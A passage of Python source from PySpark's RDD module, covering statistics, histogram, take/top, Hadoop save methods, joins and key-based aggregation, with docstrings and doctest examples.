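2.0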
"""
def redFunc(left_counter: StatCounter, right_counter: StatCounter) -> StatCounter:
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce( # type: ignore[arg-type]
redFunc
)
def histogram(
self: "RDD[S]", buckets: Union[int, List["S"], Tuple["S", ...]]
) -> Tuple[Sequence["S"], List[int]]:
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) insertion to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
Examples
--------
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x: Any) -> bool:
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a: Tuple["S", "S"], b: Tuple["S", "S"]) -> Tuple["S", "S"]:
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets # type: ignore[operator]
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv: # type: ignore[operator]
inc = (maxv - minv) * 1.0 / buckets # type: ignore[operator]
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [
buckets[i + 1] - buckets[i] # type: ignore[operator]
for i in range(len(buckets) - 1)
]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1) # type: ignore[operator]
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator: Iterable["S"]) -> Iterable[List[int]]:
counters = [0] * len(buckets) # type: ignore[arg-type]
for i in iterator:
if (
i is None
or (isinstance(i, float) and isnan(i)) # type: ignore[arg-type]
or i > maxv
or i < minv
):
continue
t = (
int((i - minv) / inc) # type: ignore[operator]
if even
else bisect.bisect_right(buckets, i) - 1 # type: ignore[arg-type]
)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a: List[int], b: List[int]) -> List[int]:
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self: "RDD[NumberOrArray]") -> "NumberOrArray":
"""
Compute the mean of this RDD's elements.
Examples
--------
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean() # type: ignore[return-value]
def variance(self: "RDD[NumberOrArray]") -> "NumberOrArray":
"""
Compute the variance of this RDD's elements.
Examples
--------
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance() # type: ignore[return-value]
def stdev(self: "RDD[NumberOrArray]") -> "NumberOrArray":
"""
Compute the standard deviation of this RDD's elements.
Examples
--------
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev() # type: ignore[return-value]
def sampleStdev(self: "RDD[NumberOrArray]") -> "NumberOrArray":
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
Examples
--------
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev() # type: ignore[return-value]
def sampleVariance(self: "RDD[NumberOrArray]") -> "NumberOrArray":
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
Examples
--------
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance() # type: ignore[return-value]
def countByValue(self: "RDD[K]") -> Dict[K, int]:
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
Examples
--------
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator: Iterable[K]) -> Iterable[Dict[K, int]]:
counts: Dict[K, int] = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1: Dict[K, int], m2: Dict[K, int]) -> Dict[K, int]:
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
@overload
def top(self: "RDD[S]", num: int) -> List["S"]:
...
@overload
def top(self: "RDD[T]", num: int, key: Callable[[T], "S"]) -> List[T]:
...
def top(self: "RDD[T]", num: int, key: Optional[Callable[[T], "S"]] = None) -> List[T]:
"""
Get the top N elements from an RDD.
Notes
-----
This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
It returns the list sorted in descending order.
Examples
--------
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator: Iterable[T]) -> Iterable[List[T]]:
yield heapq.nlargest(num, iterator, key=key)
def merge(a: List[T], b: List[T]) -> List[T]:
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
@overload
def takeOrdered(self: "RDD[S]", num: int) -> List["S"]:
...
@overload
def takeOrdered(self: "RDD[T]", num: int, key: Callable[[T], "S"]) -> List[T]:
...
def takeOrdered(self: "RDD[T]", num: int, key: Optional[Callable[[T], "S"]] = None) -> List[T]:
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
Notes
-----
This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
Examples
--------
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a: List[T], b: List[T]) -> List[T]:
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self: "RDD[T]", num: int) -> List[T]:
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and using the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
Notes
-----
This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
Examples
--------
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items: List[T] = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first parameter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator: Iterable[T]) -> Iterable[T]:
iterator = iter(iterator)
taken = 0
while taken < left:
try:
yield next(iterator)
except StopIteration:
return
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self: "RDD[T]") -> T:
"""
Return the first element in this RDD.
Examples
--------
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self) -> bool:
"""
Returns true if and only if the RDD contains no elements at all.
Notes
-----
An RDD may be empty even when it has at least 1 partition.
Examples
--------
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(
self: "RDD[Tuple[K, V]]",
conf: Dict[str, str],
keyConverter: Optional[str] = None,
valueConverter: Optional[str] = None,
) -> None:
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
"org.apache.spark.api.python.JavaToWritableConverter".
Parameters
----------
conf : dict
Hadoop job configuration
keyConverter : str, optional
fully qualified classname of key converter (None by default)
valueConverter : str, optional
fully qualified classname of value converter (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
assert self.ctx._jvm is not None
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(
pickledRDD._jrdd, True, jconf, keyConverter, valueConverter, True
)
def saveAsNewAPIHadoopFile(
self: "RDD[Tuple[K, V]]",
path: str,
outputFormatClass: str,
keyClass: Optional[str] = None,
valueClass: Optional[str] = None,
keyConverter: Optional[str] = None,
valueConverter: Optional[str] = None,
conf: Optional[Dict[str, str]] = None,
) -> None:
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or "org.apache.spark.api.python.JavaToWritableConverter". The
`conf` is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
Parameters
----------
path : str
path to Hadoop file
outputFormatClass : str
fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
keyClass : str, optional
fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
valueClass : str, optional
fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
keyConverter : str, optional
fully qualified classname of key converter (None by default)
valueConverter : str, optional
fully qualified classname of value converter (None by default)
conf : dict, optional
Hadoop job configuration (None by default)
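Examples
--------
A hedged sketch (not executed; the output path is an illustrative placeholder,
and the format/Writable classes are the ones mentioned above):
>>> rdd = sc.parallelize([(1, "a"), (2, "b")])  # doctest: +SKIP
>>> rdd.saveAsNewAPIHadoopFile(  # doctest: +SKIP
...     "hdfs:///tmp/newapi-out",
...     "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
...     keyClass="org.apache.hadoop.io.IntWritable",
...     valueClass="org.apache.hadoop.io.Text")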
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
assert self.ctx._jvm is not None
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(
pickledRDD._jrdd,
True,
path,
outputFormatClass,
keyClass,
valueClass,
keyConverter,
valueConverter,
jconf,
)
def saveAsHadoopDataset(
self: "RDD[Tuple[K, V]]",
conf: Dict[str, str],
keyConverter: Optional[str] = None,
valueConverter: Optional[str] = None,
) -> None:
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
"org.apache.spark.api.python.JavaToWritableConverter".
Parameters
----------
conf : dict
Hadoop job configuration
keyConverter : str, optional
fully qualified classname of key converter (None by default)
valueConverter : str, optional
fully qualified classname of value converter (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
assert self.ctx._jvm is not None
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(
pickledRDD._jrdd, True, jconf, keyConverter, valueConverter, False
)
def saveAsHadoopFile(
self: "RDD[Tuple[K, V]]",
path: str,
outputFormatClass: str,
keyClass: Optional[str] = None,
valueClass: Optional[str] = None,
keyConverter: Optional[str] = None,
valueConverter: Optional[str] = None,
conf: Optional[Dict[str, str]] = None,
compressionCodecClass: Optional[str] = None,
) -> None:
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or "org.apache.spark.api.python.JavaToWritableConverter". The
`conf` is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
Parameters
----------
path : str
path to Hadoop file
outputFormatClass : str
fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
keyClass : str, optional
fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
valueClass : str, optional
fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
keyConverter : str, optional
fully qualified classname of key converter (None by default)
valueConverter : str, optional
fully qualified classname of value converter (None by default)
conf : dict, optional
Hadoop job configuration (None by default)
compressionCodecClass : str, optional
fully qualified classname of the compression codec class
i.e. "org.apache.hadoop.io.compress.GzipCodec" (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
assert self.ctx._jvm is not None
self.ctx._jvm.PythonRDD.saveAsHadoopFile(
pickledRDD._jrdd,
True,
path,
outputFormatClass,
keyClass,
valueClass,
keyConverter,
valueConverter,
jconf,
compressionCodecClass,
)
def saveAsSequenceFile(
self: "RDD[Tuple[K, V]]", path: str, compressionCodecClass: Optional[str] = None
) -> None:
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the "org.apache.hadoop.io.Writable" types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
Parameters
----------
path : str
path to sequence file
compressionCodecClass : str, optional
fully qualified classname of the compression codec class
i.e. "org.apache.hadoop.io.compress.GzipCodec" (None by default)
"""
pickledRDD = self._pickled()
assert self.ctx._jvm is not None
self.ctx._jvm.PythonRDD.saveAsSequenceFile(
pickledRDD._jrdd, True, path, compressionCodecClass
)
def saveAsPickleFile(self, path: str, batchSize: int = 10) -> None:
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is :class:`pyspark.serializers.CPickleSerializer`, default batch size
is 10.
Examples
--------
>>> from tempfile import NamedTemporaryFile
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
ser: Serializer
if batchSize == 0:
ser = AutoBatchedSerializer(CPickleSerializer())
else:
ser = BatchedSerializer(CPickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
def saveAsTextFile(self, path: str, compressionCodecClass: Optional[str] = None) -> None:
"""
Save this RDD as a text file, using string representations of elements.
Parameters
----------
path : str
path to text file
compressionCodecClass : str, optional
fully qualified classname of the compression codec class
i.e. "org.apache.hadoop.io.compress.GzipCodec" (None by default)
Examples
--------
>>> from tempfile import NamedTemporaryFile
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> from tempfile import NamedTemporaryFile
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> from tempfile import NamedTemporaryFile
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> ''.join([r.decode('utf-8') if isinstance(r, bytes) else r for r in result])
'bar\\nfoo\\n'
"""
def func(split: int, iterator: Iterable[Any]) -> Iterable[bytes]:
for x in iterator:
if isinstance(x, bytes):
yield x
elif isinstance(x, str):
yield x.encode("utf-8")
else:
yield str(x).encode("utf-8")
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True # type: ignore[attr-defined]
assert self.ctx._jvm is not None
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self: "RDD[Tuple[K, V]]") -> Dict[K, V]:
"""
Return the key-value pairs in this RDD to the master as a dictionary.
Notes
-----
This method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
Examples
--------
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self: "RDD[Tuple[K, V]]") -> "RDD[K]":
"""
Return an RDD with the keys of each tuple.
Examples
--------
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self: "RDD[Tuple[K, V]]") -> "RDD[V]":
"""
Return an RDD with the values of each tuple.
Examples
--------
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(
self: "RDD[Tuple[K, V]]",
func: Callable[[V, V], V],
numPartitions: Optional[int] = None,
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, V]]":
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with `numPartitions` partitions, or
the default parallelism level if `numPartitions` is not specified.
The default partitioner is hash-partitioning.
Examples
--------
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self: "RDD[Tuple[K, V]]", func: Callable[[V, V], V]) -> Dict[K, V]:
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Examples
--------
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
func = fail_on_stopiteration(func)
def reducePartition(iterator: Iterable[Tuple[K, V]]) -> Iterable[Dict[K, V]]:
m: Dict[K, V] = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1: Dict[K, V], m2: Dict[K, V]) -> Dict[K, V]:
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self: "RDD[Tuple[K, V]]") -> Dict[K, int]:
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
Examples
--------
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, U]]",
numPartitions: Optional[int] = None,
) -> "RDD[Tuple[K, Tuple[V, U]]]":
"""
Return an RDD containing all pairs of elements with matching keys in
`self` and `other`.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in `self` and (k, v2) is in `other`.
Performs a hash join across the cluster.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, U]]",
numPartitions: Optional[int] = None,
) -> "RDD[Tuple[K, Tuple[V, Optional[U]]]]":
"""
Perform a left outer join of `self` and `other`.
For each element (k, v) in `self`, the resulting RDD will either
contain all pairs (k, (v, w)) for w in `other`, or the pair
(k, (v, None)) if no elements in `other` have key k.
Hash-partitions the resulting RDD into the given number of partitions.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, U]]",
numPartitions: Optional[int] = None,
) -> "RDD[Tuple[K, Tuple[Optional[V], U]]]":
"""
Perform a right outer join of `self` and `other`.
For each element (k, w) in `other`, the resulting RDD will either
contain all pairs (k, (v, w)) for v in `self`, or the pair (k, (None, w))
if no elements in `self` have key k.
Hash-partitions the resulting RDD into the given number of partitions.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, U]]",
numPartitions: Optional[int] = None,
) -> "RDD[Tuple[K, Tuple[Optional[V], Optional[U]]]]":
"""
Perform a full outer join of `self` and `other`.
For each element (k, v) in `self`, the resulting RDD will either
contain all pairs (k, (v, w)) for w in `other`, or the pair
(k, (v, None)) if no elements in `other` have key k.
Similarly, for each element (k, w) in `other`, the resulting RDD will
either contain all pairs (k, (v, w)) for v in `self`, or the pair
(k, (None, w)) if no elements in `self` have key k.
Hash-partitions the resulting RDD into the given number of partitions.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(
self: "RDD[Tuple[K, V]]",
numPartitions: Optional[int],
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, V]]":
"""
Return a copy of the RDD partitioned using the specified partitioner.
Examples
--------
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = self._memory_limit() / 2
def add_shuffle_key(split: int, iterator: Iterable[Tuple[K, V]]) -> Iterable[bytes]:
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000) # type: ignore[operator]
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v)) # type: ignore[operator]
c += 1
# check used memory and avg size of chunk of objects
if c % 1000 == 0 and get_used_memory() > limit or c > batch:
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch = min(sys.maxsize, batch * 1.5) # type: ignore[assignment]
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True # type: ignore[attr-defined]
assert self.ctx._jvm is not None
with SCCallSiteSync(self.context):
pairRDD = self.ctx._jvm.PairwiseRDD(keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions, id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd: "RDD[Tuple[K, V]]" = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(
self: "RDD[Tuple[K, V]]",
createCombiner: Callable[[V], U],
mergeValue: Callable[[U, V], U],
mergeCombiners: Callable[[U, U], U],
numPartitions: Optional[int] = None,
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, U]]":
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- `createCombiner`, which turns a V into a C (e.g., creates
a one-element list)
- `mergeValue`, to merge a V into a C (e.g., adds it to the end of
a list)
- `mergeCombiners`, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
Notes
-----
V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator: Iterable[Tuple[K, V]]) -> Iterable[Tuple[K, U]]:
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator: Iterable[Tuple[K, U]]) -> Iterable[Tuple[K, U]]:
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(
self: "RDD[Tuple[K, V]]",
zeroValue: U,
seqFunc: Callable[[U, V], U],
combFunc: Callable[[U, U], U],
numPartitions: Optional[int] = None,
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, U]]":
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
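Examples
--------
A minimal sketch using plain addition for both the within-partition and the
cross-partition function:
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("a", 2), ("b", 3)])
>>> sorted(rdd.aggregateByKey(0, add, add).collect())
[('a', 3), ('b', 3)]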
"""
def createZero() -> U:
return copy.deepcopy(zeroValue)
return self.combineByKey(
